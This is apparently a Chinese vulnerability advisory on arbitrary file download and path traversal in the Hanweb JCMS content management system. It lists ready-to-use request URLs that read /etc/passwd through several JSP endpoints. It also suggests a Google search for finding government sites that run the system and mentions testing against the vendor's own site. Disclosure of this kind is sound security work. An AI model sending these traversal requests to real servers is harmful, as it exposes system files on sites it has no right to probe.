大汉版通JCMS内容管理系统任意文件下载漏洞

- AV AC AU C I A
发布: 2025-04-13
修订: 2025-04-13

### 简要描述: 多处任意文件下载,影响版本未知,大概都影响吧。 ### 详细说明: 1. http://target/jcms/m_5_9/sendreport/downfile.jsp?filename=/etc/passwd&savename=passwd.txt 要得到网站路径,访问:http://target/jcms/m_5_9/sendreport/,然后生成报表就看得到了。 2. http://target/jcms/m_5_e/init/comment/opr_readfile.jsp?filename=../../../../../../../../../../../../../../../../etc/passwd 3. http://target/jcms/m_5_e/init/guestbook/opr_readfile.jsp?filename=../../../../../../../../../../../../../../../../etc/passwd 这个在乌云上已经有了: [WooYun: 各类政府网使用某程序导致任意文件读取](http://www.wooyun.org/bugs/wooyun-2013-027066) 4. 其它,如一些需要权限验证的下载页面 ### 漏洞证明: 用这系统政府门户网站居多,上谷歌inurl:gov.cn/jcms一下,使用量不是很大,级别高点的也就是几个市级单位,厂商还得努力,拿软件官网www.hanweb.com测试一下: [<img src="https://images.seebug.org/upload/201308/31200204626b92ebec1f72c0266b7d05b80ed7b5.jpg" alt="837.jpg" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201308/31200204626b92ebec1f72c0266b7d05b80ed7b5.jpg)

0%
暂无可用Exp或PoC
当前有0条受影响产品信息